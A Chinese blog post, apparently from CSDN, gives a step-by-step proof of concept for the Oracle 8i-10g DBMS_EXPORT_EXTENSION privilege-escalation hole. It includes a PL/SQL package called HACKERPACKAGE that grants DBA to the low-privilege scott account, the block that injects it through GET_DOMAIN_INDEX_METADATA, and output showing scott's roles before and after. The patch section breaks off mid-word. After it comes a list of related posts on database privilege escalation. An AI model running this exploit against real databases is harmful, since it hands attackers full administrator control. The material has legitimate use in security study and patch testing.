oracle普通用户提权,oracle 10g 漏洞--低权限用户提权方法

最新推荐文章于 2024-03-24 14:46:00 发布
最新推荐文章于 2024-03-24 14:46:00 发布
阅读量494 收藏
点赞数
文章标签: oracle普通用户提权

oracle 低权限用户提权方法:

【漏洞名称】 sys.dbms_export_extension.get_domain_index_metadata 提升权限漏洞

【影响平台】Oracle 8i / 9i / 10g / XE

【风险等级】高

【攻击需求】较低权限账号

【造成危害】取得管理员权限

【内容描述】

oracle Database Server 8.1.7.4, 9.0.1.5, 9.2.0.7, 10.1.0.5及其他版本可以允许远端攻击者执行任意SQL命令,

由于DBMS_EXPORT_EXTENSION package 中的GET_DOMAIN_INDEX_METADATA 程序存在漏洞远端

攻击者可以送出特殊建立的SQL命令来提升权限以及新增,修改,删除数据库。

【测试代码】

1、用scott/tiger登陆Oracle,scott 是oracle内建用户,权限较低,通过执行特殊参数的命令可以提升为DBA。

sqlplus scott/tiger@orcl

2、查询scott的当前角色

SQL> select * from session_roles;

ROLE

------------------------------------------------------------

CONNECT

RESOURCE

可以看到scott只有CONNECT和RESOURCE两个权限较低的角色

3、利用漏洞执行权限提升

SQL>

-- Create a function in a package first and inject this function. The function will be executed as user SYS.

Create or REPLACE

PACKAGE HACKERPACKAGE AUTHID CURRENT_USER

IS

FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env

SYS.odcienv)

RETURN NUMBER;

END;

/

Create or REPLACE PACKAGE BODY HACKERPACKAGE

IS

FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env

SYS.odcienv)

RETURN NUMBER

IS

pragma autonomous_transaction;

BEGIN

EXECUTE IMMEDIATE 'GRANT DBATO SCOTT';

COMMIT;

RETURN(1);

END;

END;

/

-- Inject the function in dbms_export_extension

DECLARE

INDEX_NAME VARCHAR2(200);

INDEX_SCHEMAVARCHAR2(200);

TYPE_NAME VARCHAR2(200);

TYPE_SCHEMAVARCHAR2(200);

VERSION VARCHAR2(200);

NEWBLOCK PLS_INTEGER;

GMFLAGS NUMBER;

v_Return VARCHAR2(200);

BEGIN

INDEX_NAME := 'A1';

INDEX_SCHEMA := 'SCOTT';

TYPE_NAME := 'HACKERPACKAGE';

TYPE_SCHEMA := 'SCOTT';

VERSION := '9.2.0.1.0';

GMFLAGS := 1;

v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(INDEX_NAME =>

INDEX_NAME,

INDEX_SCHEMA=> INDEX_SCHEMA,

TYPE_NAME => TYPE_NAME,

TYPE_SCHEMA => TYPE_SCHEMA,

VERSION => VERSION,

NEWBLOCK => NEWBLOCK,

GMFLAGS => GMFLAGS);

END;

/

sqlplus中显示"PL/SQL procedure successfully completed",提升权限成功。

4、断开连接

SQL> disc;

5、重新连接

SQL> conn scott/tiger@orcl;

6、再次查询scott的当前角色

SQL> select * from session_roles;

ROLE

------------------------------------------------------------

CONNECT

RESOURCE

DBA

Select_CATALOG_ROLE

HS_ADMIN_ROLE

EXECUTE_CATALOG_ROLE

Delete_CATALOG_ROLE

EXP_FULL_DATABASE

IMP_FULL_DATABASE

GATHER_SYSTEM_STATISTICS

WM_ADMIN_ROLE

ROLE

------------------------------------------------------------

JAVA_ADMIN

JAVA_DEPLOY

XDBADMIN

OLAP_DBA

已选择15行。

看到权限已经提升为DBA

【修补方式】

参考Oracle Critical Pat

橘子乔JVZI
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
addon-oracle-cloud-infrastructure
03-30
Oracle云基础架构(OCI)驱动程序 描述 (OCI)是一种IaaS,可提供本地高性能计算能力来运行云原生和企业公司的IT工作负载。 OCI通过将Oracle的自主服务,集成的安全性和无服务器计算相结合,为企业应用程序提供了实时弹性。 适用于公共云。 该云爆发驱动程序可帮助用户将其私有云的本地资源与OCI的资源相结合。 它允许在OCI上无缝部署虚拟机。 发展 要贡献漏洞补丁或新功能,可以使用github Pull Request模型。 假定代码和文档是根据Apache License 2.0提供的。 作者 兼容性 此插件与OpenNebula版本5.12兼容。 特征 云爆发到Oracle云基础架构 要求 Oracle Cloud Infrastructure帐户。 (从免费试用版/始终免费的Oracle Cloud帐户开始。有关详细信息,单击[此处]( )。 具有授予所需权限
CVE-2018-2893:Oracle WebLogic Server 远程代码执行漏洞分析预警
07-19
漏洞通过 JRMP 协议利用 RMI 机制的缺陷达到执行任意反序列化代码的目的。攻击者可以在未授权的情况下将 payload 封装在 T3 协议中,通过对 T3 协议中的 payload 进行反序列化,从而实现对存在漏洞的 WebLogic 组件进行远程攻击,执行任意代码并可获取目标系统的所有权限漏洞危害通过该漏洞攻击者可以在未授权的情况下远程执行任意代码。 受影响范围 WebLogic 10.3.6.0WebLogic 12.1.3.0WebLogic 12.2.1.2WebLogic 12.2.1.3以上均为官方支持的版本。
Apache Shiro Padding Oracle漏洞可导致远程命令执行漏洞解决
01-09
背景:Apach Shiro官方披露其cookie持久化参数rememberMe加密算法存在漏洞,可被Padding Oracle攻击,攻击者利用Padding Oracle攻击手段可构造恶意的rememberMe值,绕过加密算法验证,执行java反序列化操作,最终可导致远程命令执行获取服务器权限,风险极大。 1,漏洞描述: Apache Shiro < 1.4.2 版本中cookie值rememberMe通过AES-128-CBC模式加密,容易受到Padding Oracle攻击。攻击者可以通过以下步骤完成攻击: 1、登录Shiro网站,获取持久化cookie中rememberMe字段的值;
第79篇:记一次Oracle注入漏洞提权的艰难过程
ABC_123的博客
10-28 1773
Part1 前言大家好,我是ABC_123。前不久遇到一个Oracle注入漏洞,是搜索型的盲注漏洞,只能用折半法一个字符一个字符的猜解数据,使用sqlmap可以直接跑出来,经过判断是DBA权限。接下来就是想办法通过这个注入点获取操作系统的权限,但是遇到了很多问题,于是搭建环境研究了一天,最后终于获取系统权限,本期ABC_123就把这个案例分享给大家。注:本篇文章中的一些说法可能与其它文章不一样...
【内网安全】——数据库提权姿势
Demo不是emo的博客
02-10 2347
数据库提权姿势汇总
oracle提权工具-oracleShell.zip
05-04
oracle提权工具
Oracle提权
YouthBelief的博客
12-19 2808
三种方式 1.普通用户模式: 拥有一个普通的oracle连接账号,不需要DBA权限,可提权至DBA,并以oracle实例运行的权限执行操作系统命令 2.DBA用户模式:(自动化工具) sqlmap --is-dba 测试是否是dba权限 拥有DBA账号密码,可以省去自己手动创建存储过程的繁琐步骤,一键执行测试 3.注入提升模式:(sqlmap) 拥有一个oracle注入点,可以通过注入点执行系统命令,此种模式没有实现回显,需要自己验证。 三种方式的提权工具 ...
mssql&oracle数据库提权
m0_62207170的博客
03-19 1114
mssql&oracle数据库提权
提权 - MSSQL/Oracle数据库
acepanhuan的博客
02-28 428
提权 - MSSQL/Oracle数据库
Day60权限提升-MY&MS&ORA等SQL数据库提权
san3144393495的博客
12-06 982
在web环境和本地环境,都可以得到数据库的账户密码,都可以尝试借助数据库提权,再利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件:服务器开启数据库服务以及获取最高权限的密码。除了access数据库外,其他的数据库都存在提权的可能数据库提权第一步是探针,第二步是收集,第三步是分类,数据库在应用提权权限提升的意义,他不是属于溢出漏洞提权,他不是漏洞提权方式,数据库在服务器的上的搭建是很常见的,web和本地都可以用数据库提权,满足条件就是只需要获取数据库账号密码。
ORACLE直连数据库注入提权详解.pdf
07-03
ORACLE直连数据库注入提权详解 linux和windows系统直连oracle数据库提权和修复详解
Oracle 权限数据库账户得到 OS 访问权限 提权利用
09-11
大概意思就是说,如果 ORACLE 服务是用 administrator 账户启动的,你只要有一个具有 resource 和 connect 权限的数据库账户,就能利用 metasploit 的 smbrelay 功能,本地搭建一个 SMB 欺骗服务器, 来得到系统的访问权限
第60天:权限提升-MY&MS&ORA等SQL数据库提权1
08-03
在网络安全和渗透测试中,权限提升是一个关键环节,尤其是在无法利用系统级溢出漏洞时,数据库提权成为了攻击者常用的技术。本篇文章将详细讲解如何针对MY&MS&ORA等SQL数据库进行提权,以及涉及的相关知识点。 首先...
Oracle 10g数据库安全策略研究.pdf
10-10
总结来说,Oracle 10g数据库的安全策略涵盖了用户认证、安全域设置、资源限制、权限分配和角色管理等多个方面,以实现全面的数据保护。这些策略帮助企业在保证数据安全的同时,满足业务需求,确保系统的高效运行。
Oracle Solaris 11 Trusted Extensions Label Administration-124
06-19
10. **培训与意识(Training and Awareness)**:由于 Trusted Extensions 的复杂性,用户和管理员都需要接受专门的培训,理解如何正确使用和管理标签系统,以避免误操作导致的安全漏洞Oracle Solaris 11 ...
Oracle 10g更改会话整数溢出漏洞
weixin_34348174的博客
08-01 75
Oracle在处理更改会话操作时存在整数溢出漏洞,远程***者可能利用此漏洞在服务器上执行任意指令。仅拥有SELECT权限用户可以通过提交超长的alter session请求来触发这个漏洞,导致在数据库中执行任意命令。 测试方法: 以仅有CREATE SESSION权限用户的身份连接到数据库。SQL> alter session set events '...
oracle10g漏洞,Oracle 10g DBMS_Scheduler权限提升漏洞
weixin_39638647的博客
04-09 228
受影响系统:Oracle database server 10g描述:--------------------------------------------------------------------------------BUGTRAQ ID: 13509Oracle是一款大型商用数据库软件。Oracle用户访问权限的处理上存在漏洞,攻击者可能利用此漏洞提升权限。任何拥有CREATE J...
权限提升-Windows权限提升篇&数据库篇&MYSQL&MSSQL&ORACLE&自动化项目
最新发布
siu~
03-24 666
1、Web到Win-数据库提权-MSSQL 2、Web到Win-数据库提权-MYSQL 3、Web到Win-数据库提权-Oracle 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
Windows提权:利用MSSQL数据库,Oracle数据库
qq_61553520的博客
05-30 1547
MSSQL数据库提权总结归纳:MSSQL数据库三种提权方式都是死的:固定得命令执行三种提权方式都是通过web权限查看配置文件的方式获取到MSSQL数据库的账号密码,再进行提权的,MSSQL数据库是默认允许外链的,我们获得sa账户密码后,可以直接远程登录数据库。再数据库的SQL语句执行环境进行提权的。Oracle数据库的利用就很简单,工具梭哈即可。
oracle数据库提权原理
09-07
Oracle数据库提权原理涉及到Oracle数据库的权限管理和用户权限控制机制。 在Oracle数据库中,权限是分层次的,包括系统级权限和对象级权限。系统级权限用于控制数据库整体的操作,如创建用户、分配角色等;对象级权限用于控制对具体数据库对象(如表、视图、存储过程等)的操作。 当一个用户连接到Oracle数据库时,会使用一个用户名和密码进行认证。用户可以被授予不同的权限,这些权限可以直接授予给用户,也可以通过角色间接授予给用户。 在提权过程中,一般可以通过以下几种方式实现: 1. 知道管理员账号:如果获得了管理员账号(如sys账号),就可以直接拥有系统级权限,并可以创建或修改其他用户权限。 2. 注入攻击:通过利用数据库应用程序的漏洞,执行恶意代码来提权。例如,通过SQL注入攻击可以执行未经授权的SQL语句,从而获取更高级别的访问权限。 3. 通过未修补的漏洞:如果数据库服务器存在已知的未修补漏洞,攻击者可以利用这些漏洞来绕过权限限制,获得更高级别的访问权限。 4. 提权工具:一些专门用于提权的工具可以利用已知的漏洞或弱点,来获取更高级别的访问权限。 为了防止数据库提权攻击,建议采取以下措施: - 保持数据库软件和补丁的最新状态,定期更新数据库软件。 - 遵循最佳安全实践,如使用复杂的密码,定期更改密码,限制远程访问等。 - 对数据库应用程序进行安全审计和代码审查,修复潜在的漏洞。 - 限制用户权限,并按照最小权限原则授予用户所需的权限。 - 监控数据库活动,及时发现并应对异常行为。 - 配置防火墙和入侵检测系统,及时检测和阻止潜在的攻击。 以上是Oracle数据库提权的一般原理和建议措施,具体情况可能会因数据库版本、配置和应用程序的不同而有所差异。在实际应用中,请根据具体情况采取相应的安全措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值